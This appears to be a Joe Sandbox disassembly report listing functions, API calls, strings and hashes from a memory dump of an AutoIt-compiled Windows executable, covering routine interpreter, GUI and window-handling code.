Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
Instruction ID: 65a78e193a0ee5258c96033ad28b8c2ceec99dda9b43869f9894141a9691071e
Opcode Fuzzy Hash: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
Instruction Fuzzy Hash: 82519C30681305EB8B04DB10D9A29BD73B1EF54745B22A027E41AB7391E775DD43EB47

Function 00E76A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E76A91
__wcsnicmp.LIBCMT ref: 00E76AA9
__wcsnicmp.LIBCMT ref: 00E76AC1
__wcsnicmp.LIBCMT ref: 00E76AD9
__wcsnicmp.LIBCMT ref: 00E76AF1
__wcsnicmp.LIBCMT ref: 00E76B09
__wcsnicmp.LIBCMT ref: 00E76B21
__wcsnicmp.LIBCMT ref: 00E76B35
__wcsnicmp.LIBCMT ref: 00E76B76
__wcsnicmp.LIBCMT ref: 00E76B8A
__wcsnicmp.LIBCMT ref: 00E76B9E
__wcsnicmp.LIBCMT ref: 00E76BB2

Strings

#comments-start, xrefs: 00E76B1B, 00E76B70
Cannot parse #include, xrefs: 00EAE819
#comments-end, xrefs: 00E76B98
#requireadmin, xrefs: 00E76ABB
#pragma compile, xrefs: 00E76A8B
#ce, xrefs: 00E76BAC
Unterminated group of comments, xrefs: 00EAE82C
#OnAutoItStartRegister, xrefs: 00E76AD3
#include-once, xrefs: 00E76AEB
#cs, xrefs: 00E76B2F, 00E76B84
#notrayicon, xrefs: 00E76AA3
#include, xrefs: 00E76B03
Bad directive syntax error, xrefs: 00EAE743

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: ad5b7ed146930adbf73c42e3c2519ab8f2e39d4e27e4636a7b6c10b64972ccd3
Instruction ID: c7fd92bc4d8ac36823d0af26b9473712d7ef930e4998d25e30f5cb65a04d9c33
Opcode Fuzzy Hash: ad5b7ed146930adbf73c42e3c2519ab8f2e39d4e27e4636a7b6c10b64972ccd3
Instruction Fuzzy Hash: 50812B71600705BBCF21AF70CC82FAE77D8AF16708F04A025FD49BA1C6EB61EA55D261

Function 00EFAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00EFAB99
SetTextColor.GDI32(?,?), ref: 00EFAB9D
GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
GetSysColor.USER32(0000000F), ref: 00EFABBE
CreateSolidBrush.GDI32(?), ref: 00EFABC3
GetSysColor.USER32(00000011), ref: 00EFABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
SelectObject.GDI32(?,00000000), ref: 00EFABFA
SetBkColor.GDI32(?,00000000), ref: 00EFAC03
SelectObject.GDI32(?,?), ref: 00EFAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EFACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EFACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00EFACEC
DrawFocusRect.USER32(?,?), ref: 00EFACF7
GetSysColor.USER32(00000011), ref: 00EFAD05
SetTextColor.GDI32(?,00000000), ref: 00EFAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EFAD21
SelectObject.GDI32(?,00EFA869), ref: 00EFAD38
DeleteObject.GDI32(?), ref: 00EFAD43
SelectObject.GDI32(?,?), ref: 00EFAD49
DeleteObject.GDI32(?), ref: 00EFAD4E
SetTextColor.GDI32(?,?), ref: 00EFAD54
SetBkColor.GDI32(?,?), ref: 00EFAD5E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 0e01c1907479fea9c8e26cef03deb451cf2b814b5ad5b3dec8848a7dfc5f3bcd
Instruction ID: daf9e7b45ee292a82ba342a2daffc1cdd2a262fc7e16d8ef3b5c99373a402248
Opcode Fuzzy Hash: 0e01c1907479fea9c8e26cef03deb451cf2b814b5ad5b3dec8848a7dfc5f3bcd
Instruction Fuzzy Hash: FC616EB1901218EFDF119FA5DC48EBEBB79EF48320F148125FA15BB2A1D6719D40DB90

Function 00EF8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EF8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8D45
CharNextW.USER32(0000014E), ref: 00EF8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EF8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EF8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EF8DF9
SetWindowTextW.USER32(?,0000014E), ref: 00EF8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EF8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF8E8C
_memset.LIBCMT ref: 00EF8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EF8EFA
_memset.LIBCMT ref: 00EF8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EF8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00EF8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00EF9088
InvalidateRect.USER32(?,00000000,00000001), ref: 00EF90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF9121
DrawMenuBar.USER32(?), ref: 00EF9130
SetWindowTextW.USER32(?,0000014E), ref: 00EF9158

Strings

0, xrefs: 00EF90C2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 0264a87b03992557f2c05fe4bde2c31ea146383b64268212d34a5e998956c3a0
Instruction ID: 9676690ef859ff45c91d83c71706d0cb78c2f5396f17de96a927db989e492d2b
Opcode Fuzzy Hash: 0264a87b03992557f2c05fe4bde2c31ea146383b64268212d34a5e998956c3a0
Instruction Fuzzy Hash: A7E19D7090120DAEDF209F61CC88AFE7BB9EF05714F109169FA55BA291DB308A85DF61

Function 00EF4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00EF4C51
GetDesktopWindow.USER32 ref: 00EF4C66
GetWindowRect.USER32(00000000), ref: 00EF4C6D
GetWindowLongW.USER32(?,000000F0), ref: 00EF4CCF
DestroyWindow.USER32(?), ref: 00EF4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EF4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EF4D68
SendMessageW.USER32(?,00000421,?,?), ref: 00EF4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EF4D90
IsWindowVisible.USER32(?), ref: 00EF4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EF4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EF4DDF
GetWindowRect.USER32(?,?), ref: 00EF4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00EF4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00EF4E37
CopyRect.USER32(?,?), ref: 00EF4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00EF4EB9

Strings

tooltips_class32, xrefs: 00EF4D1D
0, xrefs: 00EF4BFC
(, xrefs: 00EF4E2A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
Instruction ID: d9171acf5ac6430cb090adca834e38910d727419ecc10c1ef21943dedf05ca75
Opcode Fuzzy Hash: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
Instruction Fuzzy Hash: 69B148B1604341AFDB04DF65C844B6BBBE4FF88314F009918F699AB2A2DB71EC04CB91

Function 00E727D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728BC
GetSystemMetrics.USER32(00000007), ref: 00E728C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728EF
GetSystemMetrics.USER32(00000008), ref: 00E728F7
GetSystemMetrics.USER32(00000004), ref: 00E7291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E72939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E72949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E7297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E72990
GetClientRect.USER32(00000000,000000FF), ref: 00E729AE
GetStockObject.GDI32(00000011), ref: 00E729CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E729D5

Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7

SetTimer.USER32(00000000,00000000,00000028,00E71256), ref: 00E729FC

Strings

AutoIt v3 GUI, xrefs: 00E72974

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d1ebb8d52daf4ad02defc04055da18f755126ecaa80a35e356b598094a89d19f
Instruction ID: 82fe4ee1aae3f970e5d8a38019094f3db95f63f353acedb7fdc44cffdb1321b6
Opcode Fuzzy Hash: d1ebb8d52daf4ad02defc04055da18f755126ecaa80a35e356b598094a89d19f
Instruction Fuzzy Hash: A1B16C71A0020AAFDB14DFA8DC45BAE7BB5FF48315F109129FA19FA290DB70A845DB50

Function 00EF4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EF40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EF41B6

Strings

SELECTINVERT, xrefs: 00EF4286
GETITEMCOUNT, xrefs: 00EF4128
SELECTCLEAR, xrefs: 00EF4235
VIEWCHANGE, xrefs: 00EF4375
GETSELECTED, xrefs: 00EF42E4
GETSELECTEDCOUNT, xrefs: 00EF4199
DESELECT, xrefs: 00EF42A4
GETSUBITEMCOUNT, xrefs: 00EF4141
ISSELECTED, xrefs: 00EF41C1
GETTEXT, xrefs: 00EF415F
FINDITEM, xrefs: 00EF4329
SELECTALL, xrefs: 00EF421D
SELECT, xrefs: 00EF4250

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
Instruction ID: a5ce7e4331400c08f8f110a435a68124e3dbf38f5f22c5869780f9c1bdccfe34
Opcode Fuzzy Hash: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
Instruction Fuzzy Hash: 70A17B702142199FCB14EF24C951A7AB3E5AF84314F14A96DB99ABB3D3DB30ED06CB41

Function 00EE52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00EE5309
LoadCursorW.USER32(00000000,00007F8A), ref: 00EE5314
LoadCursorW.USER32(00000000,00007F00), ref: 00EE531F
LoadCursorW.USER32(00000000,00007F03), ref: 00EE532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00EE5335
LoadCursorW.USER32(00000000,00007F01), ref: 00EE5340
LoadCursorW.USER32(00000000,00007F81), ref: 00EE534B
LoadCursorW.USER32(00000000,00007F88), ref: 00EE5356
LoadCursorW.USER32(00000000,00007F80), ref: 00EE5361
LoadCursorW.USER32(00000000,00007F86), ref: 00EE536C
LoadCursorW.USER32(00000000,00007F83), ref: 00EE5377
LoadCursorW.USER32(00000000,00007F85), ref: 00EE5382
LoadCursorW.USER32(00000000,00007F82), ref: 00EE538D
LoadCursorW.USER32(00000000,00007F84), ref: 00EE5398
LoadCursorW.USER32(00000000,00007F04), ref: 00EE53A3
LoadCursorW.USER32(00000000,00007F02), ref: 00EE53AE
GetCursorInfo.USER32(?), ref: 00EE53BE
GetLastError.KERNEL32(00000001,00000000), ref: 00EE53E9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
Instruction ID: 400fe3bd36d7739c28be7c585744d6d372f0bcd29b4577273a9b062102e9f8f9
Opcode Fuzzy Hash: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
Instruction Fuzzy Hash: BE416071E043196ADB109FBA8C49D6EFEF8EF91B10F10452FE519E7291DAB8A401CE61

Function 00ECAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00ECAAA5
__swprintf.LIBCMT ref: 00ECAB46
_wcscmp.LIBCMT ref: 00ECAB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ECABAE
_wcscmp.LIBCMT ref: 00ECABEA
GetClassNameW.USER32(?,?,00000400), ref: 00ECAC21
GetDlgCtrlID.USER32(?), ref: 00ECAC73
GetWindowRect.USER32(?,?), ref: 00ECACA9
GetParent.USER32(?), ref: 00ECACC7
ScreenToClient.USER32(00000000), ref: 00ECACCE
GetClassNameW.USER32(?,?,00000100), ref: 00ECAD48
_wcscmp.LIBCMT ref: 00ECAD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00ECAD82
_wcscmp.LIBCMT ref: 00ECAD96

Part of subcall function 00E9386C: _iswctype.LIBCMT ref: 00E93874

Strings

%s%u, xrefs: 00ECAB40

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
Instruction ID: 528855467fb0f243759e6b51a12d2e6cc73c109ec021fda1b3d5c3cee3f70204
Opcode Fuzzy Hash: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
Instruction Fuzzy Hash: ADA1B07120420AAFD714DE20C984FEAFBE8FF4431DF04552DF99AE2190DB31A946CB92

Function 00ECB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00ECB3DB
_wcscmp.LIBCMT ref: 00ECB3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00ECB414
CharUpperBuffW.USER32(?,00000000), ref: 00ECB431
_wcscmp.LIBCMT ref: 00ECB44F
_wcsstr.LIBCMT ref: 00ECB460
GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB498
_wcscmp.LIBCMT ref: 00ECB4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00ECB4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB518
_wcscmp.LIBCMT ref: 00ECB528
GetClassNameW.USER32(00000010,?,00000400), ref: 00ECB550
GetWindowRect.USER32(00000004,?), ref: 00ECB5B9

Strings

ThumbnailClass, xrefs: 00ECB4A3, 00ECB523
@, xrefs: 00ECB3BC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
Instruction ID: 7d6b44e0e0238f02c9fe563d80644321cb9651267ed67690a6af42d38f63089b
Opcode Fuzzy Hash: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
Instruction Fuzzy Hash: 6C8180710083059FDB14DF14CA86FAA77E8EF44318F04A56DFD89AA092EB35DD4ACB61

Function 00ECB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00ECB23F

Strings

REGEXP=, xrefs: 00ECB254
HANDLE=, xrefs: 00ECB238
[ALL, xrefs: 00ECB2E5
[HANDLE:, xrefs: 00ECB24B
ACTIVE, xrefs: 00ECB21A
[CLASS:, xrefs: 00ECB28F
ALL, xrefs: 00ECB2D3
[ACTIVE, xrefs: 00ECB22C
LAST, xrefs: 00ECB204
CLASSNAME=, xrefs: 00ECB27C
[REGEXPTITLE:, xrefs: 00ECB267
[LAST, xrefs: 00ECB2EC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
Instruction ID: ccc5474f2528179d4bae3ac2807d2855e31ef4e2d03017753259e918e2d5b5e6
Opcode Fuzzy Hash: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
Instruction Fuzzy Hash: AF31C831948315A6DF18FA60DE43FEE77E89F10750F60502DF845720E1EF92AE05D552

Function 00ECC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00ECC4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ECC4E6
SetWindowTextW.USER32(?,?), ref: 00ECC4FD
GetDlgItem.USER32(?,000003EA), ref: 00ECC512
SetWindowTextW.USER32(00000000,?), ref: 00ECC518
GetDlgItem.USER32(?,000003E9), ref: 00ECC528
SetWindowTextW.USER32(00000000,?), ref: 00ECC52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ECC54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ECC569
GetWindowRect.USER32(?,?), ref: 00ECC572
SetWindowTextW.USER32(?,?), ref: 00ECC5DD
GetDesktopWindow.USER32 ref: 00ECC5E3
GetWindowRect.USER32(00000000), ref: 00ECC5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ECC636
GetClientRect.USER32(?,?), ref: 00ECC643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ECC668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ECC693

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
Instruction ID: b237d1741d5af3ffbe4ac025e6893422987c36dccd1a61db6b269148fd45acfd
